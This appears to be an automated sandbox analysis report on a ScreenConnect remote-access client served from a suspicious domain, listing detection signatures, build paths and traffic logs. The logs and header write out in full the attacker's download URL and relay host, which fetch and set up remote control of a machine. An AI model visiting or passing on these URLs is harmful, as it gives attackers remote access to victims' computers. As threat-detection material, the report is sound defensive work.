Windows Analysis Report
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPq

Overview

General Information

Sample URL:	https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2
Analysis ID:	1544862
Infos:

Detection

ScreenConnect Tool

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

.NET source code references suspicious native API functions

AI detected suspicious URL

Changes security center settings (notifications, updates, antivirus, firewall)

Contains functionality to hide user accounts

Enables network access during safeboot for specific services

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Drops PE files

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

PE file contains an invalid checksum

PE file does not import any functions

PE file overlay found

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores files to the Windows start menu directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Signatures

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.219.254:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49743 version: TLS 1.2

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Misc\Bootstrapper\Release\ClickOnceRunner.pdb source: support.Client.exe, 0000000D.00000000.1408916929.000000000025B000.00000002.00000001.01000000.00000006.sdmp, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A346A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll0.14.dr, ScreenConnect.ClientService.dll.14.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000012.00000000.1939664334.00000000007FD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.ClientService.exe0.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll.14.dr, ScreenConnect.Windows.dll0.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe

Registry value created: NULL Service

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49721
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49729
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49722
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49727
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49726
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49731
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49730
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49733

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.23
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200

Source: global traffic	HTTP traffic detected: GET /Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r= HTTP/1.1Host: cp9856.chelokipotlester.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: /Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?a75363d0418258491551ead6717ca895 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: c-ring.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?3d4619f8959a0bb944ce9eb8ccf482ff HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: c-ring.msedge.netConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: cp9856.chelokipotlester.icu
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cp3back96.site

Source: unknown

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109009A83X-BM-CBT: 1707317755X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Device-ClientSession: B2DC660161784379B3117A8C8CEC12A1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109009A83X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2X-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 765Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D

Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3976000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3986000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3477000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32AC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.WindowsFileManager.exe0.14.dr, Unconfirmed 974768.crdownload.0.dr, ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsClient.exe0.14.dr, 